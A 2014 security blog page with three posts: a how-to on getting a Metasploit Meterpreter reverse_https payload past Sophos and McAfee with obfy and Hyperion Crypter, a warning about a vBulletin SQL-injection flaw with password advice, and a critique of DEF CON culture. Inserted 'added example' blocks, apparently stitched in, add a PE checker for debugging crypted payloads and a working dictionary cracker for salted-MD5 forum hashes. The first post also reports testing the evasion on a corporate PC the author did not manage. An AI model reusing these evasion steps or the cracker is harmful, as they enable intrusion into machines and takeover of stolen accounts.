Tuesday, July 22, 2014

Obfy, Hyperion Crypter, and bypassing AV

I've noticed for a while now that payloads made by obfy and then encrypted with Hyperion Crypter don't seem to work on my system. I figured I had screwed up crypter on my VM, but that isn't it; something else is wrong, I think.

First, let me say there is a new version of Hyperion Crypter. You should download it and compile and install it.

Now, with that out of the way, I'm testing against Sophos right now. While obfy by itself still seems to bypass McAfee with no issues, it doesn't get past Sophos, and with the crypter part broken I needed to do something else. So I tried smbexec and it worked fine against Sophos, and I noted that its payload was encrypted by crypter and worked. (See the compile and install it link above for smbexec and crypter info if that is new to you.) So that got me wondering. Next I made a simple payload:
msfpayload windows/meterpreter/reverse_https LHOST= LPORT=443 X >payload.exe
Then I ran crypter.exe on it:
cd /opt/crypter (crypter only seems to work while you are in the directory)
wine ./crypter.exe /root/payload.exe payloadc.exe

Payload.exe was picked up by Sophos and will be by any AV program. But payloadc.exe ran fine and the shell worked. Simple as that. No Veil framework, smbexec, encoding, magic or anything else needed: an msfpayload-generated exe run through crypter.exe, and Sophos is fine with it. Two steps and easy. (It should be noted that the Sophos install I'm testing against is a live corporate PC, not managed or installed by me, so it may or may not be configured well or doing everything it can to detect payloads.)

This goes to show that different AV bypassing techniques work better against different vendors, and having many tools to pull from is your best option. That said, it annoys me that crypter.exe creates broken executables from obfy files but not from msfpayload files, and I don't know why, or why it suddenly stopped working when I didn't change anything. I don't even know if this is a problem for everyone or just me.

If you use this tool and have feedback, let me know. If I hear that it doesn't work for other people too and collectively we can't figure out why, I will probably pull that option from the code. In reality the more powerful part of obfy is altering the ASM of just about any ASM file you feed into it, quickly, to save you the time of doing it manually. In that case it is still a nice supporting tool, and of course, for the time being, a bypass-McAfee button for some strange reason. I expect that part to stop working someday.
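As an added example (mine, not code from the original post, from obfy or from Hyperion): before blaming the AV or the crypter stub for an output that "doesn't work", check whether the file is still a structurally valid PE at all. The script below parses the DOS header, PE signature, COFF and optional headers and the section table, and reports the first thing that is broken (truncated output, a bad e_lfanew, section data past end of file, an entry point outside every section). The sample image it builds is a constructed, non-functional PE32 used only as input; real files such as payloadc.exe are passed on the command line. A clean result only means the headers are sane, not that the stub will run.

```python
"""Triage a crypter's output: is the file still a structurally valid PE?

Added example, not part of obfy or Hyperion. It catches the common ways a
crypter or packer breaks a binary; it does not prove the file will run.
"""
import struct
import sys


def build_minimal_pe():
    """Construct a tiny, non-functional PE32 image for use as sample input (not a payload)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                        # e_lfanew: PE header follows DOS header
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)   # i386, 1 section, 224-byte optional header
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                          # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000)                        # AddressOfEntryPoint -> start of .text
    sect = struct.pack("<8sIIII", b".text", 0x10, 0x1000, 0x10, 0x200)  # 16 raw bytes at file offset 0x200
    header = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sect
    return header + b"\0" * (0x200 - len(header)) + b"\xC3" * 0x10   # .text = 16 x RET


def parse_pe(data):
    """Parse the headers; raise ValueError naming the first structural problem found."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data):
        raise ValueError("e_lfanew points past end of file")
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    machine, nsect, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt_off = e_lfanew + 24
    if opt_size < 20 or opt_off + opt_size > len(data):
        raise ValueError("optional header truncated")
    magic = struct.unpack_from("<H", data, opt_off)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError(f"unknown optional header magic {magic:#x}")
    entry = struct.unpack_from("<I", data, opt_off + 16)[0]    # same offset in PE32 and PE32+
    sections = []
    for i in range(nsect):
        off = opt_off + opt_size + 40 * i
        if off + 40 > len(data):
            raise ValueError("section table truncated")
        raw_name, vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", data, off)
        name = raw_name.rstrip(b"\0").decode("ascii", "replace")
        if rawptr + rawsize > len(data):
            raise ValueError(f"section {name} raw data runs past end of file")
        sections.append({"name": name, "vaddr": vaddr, "vsize": vsize,
                         "rawptr": rawptr, "rawsize": rawsize})
    if not any(s["vaddr"] <= entry < s["vaddr"] + max(s["vsize"], s["rawsize"]) for s in sections):
        raise ValueError(f"entry point {entry:#x} is outside every section")
    return {"machine": machine, "pe32plus": magic == 0x20B, "entry": entry, "sections": sections}


def check_payload(data):
    """Return (True, 'ok') or (False, reason) so the check can be run over a batch of outputs."""
    try:
        parse_pe(data)
        return True, "ok"
    except ValueError as exc:
        return False, str(exc)


if __name__ == "__main__":
    good = build_minimal_pe()
    samples = {                                                    # constructed inputs, not real crypter output
        "constructed-good": good,
        "truncated": good[:0x180],
        "bad-e_lfanew": good[:0x3C] + struct.pack("<I", 0xFFFF) + good[0x40:],
    }
    for name, blob in samples.items():
        print(f"{name}: {check_payload(blob)}")
    for path in sys.argv[1:]:                                     # e.g. payloadc.exe from the post
        with open(path, "rb") as fh:
            print(f"{path}: {check_payload(fh.read())}")
```

Run it as `python pecheck.py payload.exe payloadc.exe` and compare the two: if the crypted file fails here, the crypter mangled the container and no amount of AV tuning is the issue; if it passes, the problem is in the stub or its decryption at runtime.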

Friday, July 18, 2014

Change your password gamers

A quick note for all you online gamers out there. If you play online games, MMOs, etc. and have for a while, you have probably joined a fair number of online gaming boards over the years: guild after guild most likely, plus alliance after alliance if you play EVE. A good number of those sites run vBulletin software. If you game a lot you probably recognize a vBulletin site without even having to scroll down to the bottom and see the logo, and are happy to see it rather than a less friendly free forum site. Well, there is a new SQLi vulnerability in the 5.x branch of that software, and the people who found it said they will release the code in the wild soon. The official announcement is here: http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4097503-security-patch-release-for-vbulletin-5-0-4-5-0-5-5-1-0-5-1-1-and-5-1-2

It should be noted this isn't the first SQLi vulnerability found in this software over the years. But I have a feeling this one is going to be used a lot, so I'm giving this warning.

For those who don't know, a SQLi attack lets people pull data out of the database the site uses to store things like, say, your username and password hash. vBulletin by default stores passwords as an MD5 hash with a 3-character salt. If you don't know what that means, just know that MD5 is very fast to compute and a per-user salt only stops precomputed tables; anyone holding the dump can still run a wordlist against every hash, so weak passwords fall in seconds. No biggie, right? Well, ask yourself...
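To make "easy to crack" concrete, here is an added example (mine, not from the post): a dictionary attack against a constructed forum dump. It assumes the classic vBulletin 3/4 hash format md5(md5(password) + salt) with a 3-character salt, which matches the post's description; whether a given 5.x install still uses that exact scheme is an assumption here. It also tries the one-character variants people use to "differ" a reused password, which is the point about changing a character at the end. Usernames, passwords and salts are made up for the example.

```python
"""Dictionary attack on salted-MD5 forum hashes (added example, not from the post).

Assumes the classic vBulletin 3/4 scheme md5(md5(password) + salt) with a
3-character salt. The per-user salt defeats precomputed tables, but MD5 is so
fast that running a wordlist against every user individually costs nothing.
"""
import hashlib
import string


def vb_hash(password, salt):
    """md5(md5(password) + salt), hex-encoded, as stored in the user table (assumed scheme)."""
    inner = hashlib.md5(password.encode()).hexdigest()
    return hashlib.md5((inner + salt).encode()).hexdigest()


def candidates(wordlist):
    """Each word, its capitalised form, and the cheap one-character suffixes people add."""
    for word in wordlist:
        for base in (word, word.capitalize()):
            yield base
            for suffix in string.digits + "!":
                yield base + suffix


def crack(rows, wordlist):
    """rows: (username, stored_hash, salt). Returns ({username: password}, hashes_computed)."""
    found, work = {}, 0
    for username, digest, salt in rows:
        for cand in candidates(wordlist):
            work += 1
            if vb_hash(cand, salt) == digest:
                found[username] = cand
                break
    return found, work


# Constructed sample dump: passwords and salts chosen here, not real accounts.
SAMPLE_PASSWORDS = {"arthas": "frostmourne", "jaina": "Frostmourne1", "leeroy": "x9#Qv!r2Lp"}
SAMPLE_SALTS = {"arthas": "a$1", "jaina": "Kq7", "leeroy": "!zB"}
SAMPLE_DUMP = [(u, vb_hash(p, SAMPLE_SALTS[u]), SAMPLE_SALTS[u]) for u, p in SAMPLE_PASSWORDS.items()]
WORDLIST = ["password", "warcraft", "frostmourne", "dragon"]   # a real attack uses millions of entries

if __name__ == "__main__":
    found, work = crack(SAMPLE_DUMP, WORDLIST)
    for user, _, _ in SAMPLE_DUMP:
        print(f"{user}: {found.get(user, '<not in wordlist or variants>')}")
    print(f"{work} MD5 pairs computed")
```

Two of the three constructed accounts fall to a four-word list plus suffix variants; only the random password survives, and the salt did nothing to slow that down. Swap the wordlist for a real one and the same loop is what someone runs against a leaked forum table.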

On any of these numerous sites you signed up to over the years (god help EVE players; they probably can't even find all the old alliance ones), how easy is it for someone to find the game or games you play and the username you use to log in with? If you are good, your login name is nowhere on any of these sites for most games, and your account names aren't the same as, or a single character off from, the names you do post under. Some games like ESO are idiotic and force you to tell everyone your login name, however. If by chance you play ESO, or one of your characters' names is also your login name for a game and you give that name up in posts, signatures or profiles in forums all over the Internet, ask yourself this: did you use the same password on one or more game forums that you use to log in to the game with? If so, you are either going to spend some time changing passwords, or learn a life lesson the hard way when your account is banned for gold selling or something, and when you finally get it unbanned you have nothing; even your characters are deleted.

Think about it. You should never use a game password on forum sites, ever, ever, ever. And changing one character at the end isn't clever enough to not get figured out, btw.

So if you are freaking right now do this:
1. Stop using your character name as your login name where you can help it (ESO aside; that was a bad move on their part)
2. Never use passwords for games on any other website
3. Go change all your game passwords

If you share passwords between sites you likely don't have a system and/or a password manager. Here is some final advice.
Come up with a system to help you remember passwords without sharing them, like incorporating part of the name of the site into the password. Bear in mind that a pattern that is obvious from a single leaked password (the site name tacked on the end, say) gives away all the others, so the manager is the better answer.
Use a password manager. Here are three I like:
LastPass: web plugin, cross platform. My current option because it is cross platform; free.
KeePass: good stand-alone one for Windows; I found it annoying on the Mac; free.
PINs: good stand-alone one for Windows. Older now but still good, and doesn't need an install: the password file and the exe are all you need, so it is 100% portable, but Windows only; free.

Thursday, July 17, 2014

It is time for DEF CON to grow up

I've been putting this blog post off for a while, and I've read a few others like it while I've been putting it off, so I almost didn't bother. But I think I have something slightly different to say, so I decided it was worth it. Let me start from the beginning. DEF CON is special to me. DEF CON 8 was pure magic in my life; that was my first one and it changed my life. I've been to every one since except for one, due to the birth of my child, which was poor planning on my part. So what I say is with love and as real feedback.

DEF CON 8 was also my first trip to Vegas. All the half-dressed women walking around, some handing out floppy disks with nude pics of themselves on them, was part of the Vegas experience to me. I loved it. But that was a long time ago. I recently had to explain to a good female friend of mine who wanted to go to DEF CON that it was probably a bad idea. I did it by explaining in detail how Hacker Jeopardy worked. Oh... she said. Then I had to explain that a good number of con goers have limited social skills, that it would be highly likely for her to get stared at and inappropriately propositioned during the con, and that the Goons would almost certainly ignore any complaints about it. She decided not to go, which I thought was wise.

That conversation got me wondering: do I want my daughter to go when she is old enough? I've always wanted that since I had kids, but the more I think of it, the more the answer is no, unless the con grows up. It will be a world she is unfamiliar with and I don't want to expose it to her in that way. In short, DEF CON's attitude about women is roughly what a young white male's attitude was 20 years ago.

So, it is past time for DEF CON to grow up. It is no more appropriate for DEF CON to still have 20-year-old attitudes about women than it would be for, say, a southern country club to still have 50-year-old attitudes about race. There should be no objectifying of women in any official event, which would include no stripping in Hacker Jeopardy. Women and men not wearing enough clothes should be asked to leave until fully dressed. Goons should be trained not only to deal with inappropriate and unwanted advances and comments properly but to look for them and act on them even if the victim doesn't complain, since the problem is already well known. That should hopefully set the tone and change the culture, and after a year or two the Goons could back off a bit.

I don't think any of this will happen. That said, my plan this year is to skip Black Hat and go to B-Sides Vegas instead. I plan to go to DEF CON, but I don't plan to spend a dime on anything but a badge. Not a huge protest, I know, but it is a start and, like I said, DEF CON is special to me. I'll see how things go. If nothing changes this year and there is nothing to make me think it will be different next year, I probably won't be going back to DEF CON after this year until I hear they have changed. There is no reason to put up with it anymore. B-Sides in many cities are great and DerbyCon is great.

I recommend everyone else who goes think about this as well, and if it matters to you, start making your voices heard and stop going if they don't listen. Times are different; we can skip DEF CON without missing out, and I'm starting to think we should.